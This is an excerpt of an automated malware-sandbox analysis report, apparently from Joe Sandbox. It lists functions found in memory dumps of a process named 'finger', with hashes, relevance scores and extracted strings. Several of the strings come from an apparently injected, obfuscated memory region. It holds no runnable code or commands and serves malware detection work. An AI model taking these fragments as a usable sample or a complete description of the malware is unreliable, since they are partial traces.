                                                                                                                                      • Opcode ID: 8181c8654b4778ca22122711ea1bc35289885c20878a786c2ab7680ee0d1e002
                                                                                                                                      • Instruction ID: fd6dd4e9c09d234433b63ee7bf6c621993847ec93b072550542dec2ad24d0948
                                                                                                                                      • Opcode Fuzzy Hash: 8181c8654b4778ca22122711ea1bc35289885c20878a786c2ab7680ee0d1e002
                                                                                                                                      • Instruction Fuzzy Hash: F5410870528F0D4FC768EF699082676F3E1FB89300F90452DC99AC7252E7B0E4878785
                                                                                                                                      Function 032EDFC9 Relevance: 57.7, Strings: 46, Instructions: 218COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587836704.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_32e0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                      • API String ID: 0-3754132690
                                                                                                                                      • Opcode ID: 0486a1a3788a22a9200b2b7c6af9070ef4023c6ef910aabddfe15e112bfe65e9
                                                                                                                                      • Instruction ID: 269e6c0709ece6eaf1c89e0be3b5e2ff07fcbe3537350555b05812069bce1ed5
                                                                                                                                      • Opcode Fuzzy Hash: 0486a1a3788a22a9200b2b7c6af9070ef4023c6ef910aabddfe15e112bfe65e9
                                                                                                                                      • Instruction Fuzzy Hash: DC9160F04182988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                                                                                      Function 03522890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                      • Opcode ID: 5a85fdece5e8dc4ec91c17620d39f7b4f417034dc68f4a930874bfeaced54f57
                                                                                                                                      • Instruction ID: 2fd58ba7a10632511feabf7e6773d76f9e8db42a4916852a4ef8a1c5471bd6fc
                                                                                                                                      • Opcode Fuzzy Hash: 5a85fdece5e8dc4ec91c17620d39f7b4f417034dc68f4a930874bfeaced54f57
                                                                                                                                      • Instruction Fuzzy Hash: 92512179A00216BFCF51DF58D89097EFBB8BB46200B54866AF455D7691D334DE40C7E0
                                                                                                                                      Function 03592410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                      • Opcode ID: dfa5bd62e35c1287bf254e04866ff19e7fcb7d053f37c69bbc7d6103a5a25836
                                                                                                                                      • Instruction ID: 0d9cddb4efeda384983d05dd93f81e078f872b73379e68183410ccde2428d3ed
                                                                                                                                      • Opcode Fuzzy Hash: dfa5bd62e35c1287bf254e04866ff19e7fcb7d053f37c69bbc7d6103a5a25836
                                                                                                                                      • Instruction Fuzzy Hash: FE51E575A00649BEEF20DE9DD89097EB7F9BF44200F048C5BE49ACB691E774DA008760
                                                                                                                                      Function 032E3B81 Relevance: 17.6, Strings: 14, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587836704.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_32e0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #>&"$$)jq$$8=5$4#~c$4~be$70#8$9#><$:>xq$=8:4$==0~$>38=$>85q$~dbf$~dbf
                                                                                                                                      • API String ID: 0-3936019208
                                                                                                                                      • Opcode ID: 23477238abfb53dc3cc93e125f478709c3c5955643ce59dd4c39dbf6c6f46513
                                                                                                                                      • Instruction ID: e2eb67487b8536c0041762cfed97be74705cc4d24714689c4517b3cadcb1564b
                                                                                                                                      • Opcode Fuzzy Hash: 23477238abfb53dc3cc93e125f478709c3c5955643ce59dd4c39dbf6c6f46513
                                                                                                                                      • Instruction Fuzzy Hash: 814103B491438CDFCF24DF85D5416EEBBB1FF04344F804059E8096F258C2B58AA6CB89
                                                                                                                                      Function 03517630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03554725
                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03554655
                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03554742
                                                                                                                                      • ExecuteOptions, xrefs: 035546A0
                                                                                                                                      • Execute=1, xrefs: 03554713
                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035546FC
                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03554787
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                      • Opcode ID: 98ac2cf0b563711259cda9316802516dd8ac2560cea27ea32015820295eeb9a6
                                                                                                                                      • Instruction ID: b066823996120512db3530a4a9d0861540120303be6d790c1cd65ef8e4338d4b
                                                                                                                                      • Opcode Fuzzy Hash: 98ac2cf0b563711259cda9316802516dd8ac2560cea27ea32015820295eeb9a6
                                                                                                                                      • Instruction Fuzzy Hash: E9514935A103197AEF10EBA9FC95FAD77B8BF48300F14049AE505AB1B1E770AA558F90
                                                                                                                                      Function 0352B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                      • Instruction ID: fc7465d6cf0d22cfd61f8aeadd9a81d064de9439d9053c5505b876106532553a
                                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                      • Instruction Fuzzy Hash: A381BF70E056699EDF28CE68E8917FEBFB2BF46310F1C4659D861A73E1C73498408B90
                                                                                                                                      Function 035920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                                      • Opcode ID: 810ad37823527613846a70bd2efce494c1e38dfedbc6f3129ace13a798720741
                                                                                                                                      • Instruction ID: 7f4b0177f4cd0d25f938584e503ff073763c6081a0dc9152b8df1c1e4e9b449f
                                                                                                                                      • Opcode Fuzzy Hash: 810ad37823527613846a70bd2efce494c1e38dfedbc6f3129ace13a798720741
                                                                                                                                      • Instruction Fuzzy Hash: A121627AE0025DABDB10DF79EC40AEEBBF8FF44650F580526E905E7250E730D9119BA1
                                                                                                                                      Function 0350F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035502BD
                                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035502E7
                                                                                                                                      • RTL: Re-Waiting, xrefs: 0355031E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                      • API String ID: 0-2474120054
                                                                                                                                      • Opcode ID: 4f6bfe85c853fb1cf04f2ce76904cfe75af8556a7aab8dafa8147f82c618492f
                                                                                                                                      • Instruction ID: dcd422fadc4aac21de8ac8b188eb5bc1beeda511c146d1faf4f6470626b8421c
                                                                                                                                      • Opcode Fuzzy Hash: 4f6bfe85c853fb1cf04f2ce76904cfe75af8556a7aab8dafa8147f82c618492f
                                                                                                                                      • Instruction Fuzzy Hash: A3E1AD346047429FD724CF28E894B2AB7E0BF85314F180A5EF8A58B2F1D775E945CB42
                                                                                                                                      Function 0351BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03557B7F
                                                                                                                                      • RTL: Re-Waiting, xrefs: 03557BAC
                                                                                                                                      • RTL: Resource at %p, xrefs: 03557B8E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                      • API String ID: 0-871070163
                                                                                                                                      • Opcode ID: 530090a2e8c1aacd69f316e24c0ee2fb2b6496cd7bb6763c02320224ba3fcbb5
                                                                                                                                      • Instruction ID: 696c0ba7fcd460485df9b0b46092521c5a41b5ad031a2affd4953921032863f1
                                                                                                                                      • Opcode Fuzzy Hash: 530090a2e8c1aacd69f316e24c0ee2fb2b6496cd7bb6763c02320224ba3fcbb5
                                                                                                                                      • Instruction Fuzzy Hash: DE41E1357007029FD724CE25E850B6AB7E5FF89720F140A1EF85ADB6A0EB71E415CB91
                                                                                                                                      Function 0351B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0355728C
                                                                                                                                      Strings
                                                                                                                                      • RTL: Re-Waiting, xrefs: 035572C1
                                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03557294
                                                                                                                                      • RTL: Resource at %p, xrefs: 035572A3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                                      • Opcode ID: 75482c2e22c4eefdd907f141ee08dbcddd0472182c3516912b2515f6aec84de7
                                                                                                                                      • Instruction ID: 0427b3ff34039e4542bf8ecbee46bfe7af3b10548aec078dfb2678d19671dc36
                                                                                                                                      • Opcode Fuzzy Hash: 75482c2e22c4eefdd907f141ee08dbcddd0472182c3516912b2515f6aec84de7
                                                                                                                                      • Instruction Fuzzy Hash: BF41FF35700202ABD720CE25EC41F6AB7A6FF88710F144A1AFC55EB2A0DB61F8528BD1
                                                                                                                                      Function 03592300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                      • Opcode ID: 8bb903806d5cb44cbbef6e5a34c172cd52eaded5ce8456db81e77642639c6396
                                                                                                                                      • Instruction ID: 68b1b35821aa537515b7df974d2cf9ea5f0e881b4815c8e9c8c28497ba8fce62
                                                                                                                                      • Opcode Fuzzy Hash: 8bb903806d5cb44cbbef6e5a34c172cd52eaded5ce8456db81e77642639c6396
                                                                                                                                      • Instruction Fuzzy Hash: 8C316876A0021DAFDF20DE29EC40BEEB7F8FF44610F544956E849E7150EB309A458BA0
                                                                                                                                      Function 03527D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                      • String ID: +$-
                                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                      • Instruction ID: 479160b7943a9a18f01f5ea3ac10cf3d6c59a821d126ba910df16e0fd87463bd
                                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                      • Instruction Fuzzy Hash: 4491E770E042369BDF24CF69E8816BEBFB5FF4A320F18451AE861E72E1D73099408720
                                                                                                                                      Function 034E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$@
                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                      • Opcode ID: 14b0fbce7b87ee7a8db2c548f0a6ba24f9ef1ae86ff18a47836db5c774286d66
                                                                                                                                      • Instruction ID: c30453f6685592def238ff5d793e85e525ab69bea89de956f47f45cdaaa7425a
                                                                                                                                      • Opcode Fuzzy Hash: 14b0fbce7b87ee7a8db2c548f0a6ba24f9ef1ae86ff18a47836db5c774286d66
                                                                                                                                      • Instruction Fuzzy Hash: C1815975D002699BDB35CB54DC44BEEB7B8BB48700F0445EAE919BB290E7309E85CFA4
                                                                                                                                      Function 032E3A78 Relevance: 5.0, Strings: 4, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587836704.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_32e0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !-ih$h$jwd}$kaly
                                                                                                                                      • API String ID: 0-917893273
                                                                                                                                      • Opcode ID: 827d4f489632d26c2774ea9bdefe9c8f61aa2b998280c1ba9a70b0c05c48b0c5
                                                                                                                                      • Instruction ID: c00ad340a4b6cb3155672bc224c9a9e2177b65a526ffa2f662692b3233ea6d60
                                                                                                                                      • Opcode Fuzzy Hash: 827d4f489632d26c2774ea9bdefe9c8f61aa2b998280c1ba9a70b0c05c48b0c5
                                                                                                                                      • Instruction Fuzzy Hash: ABE06534028B4446CB04AF14840525A7BD5FB88309F84575DE8D9DA291DA75D356874A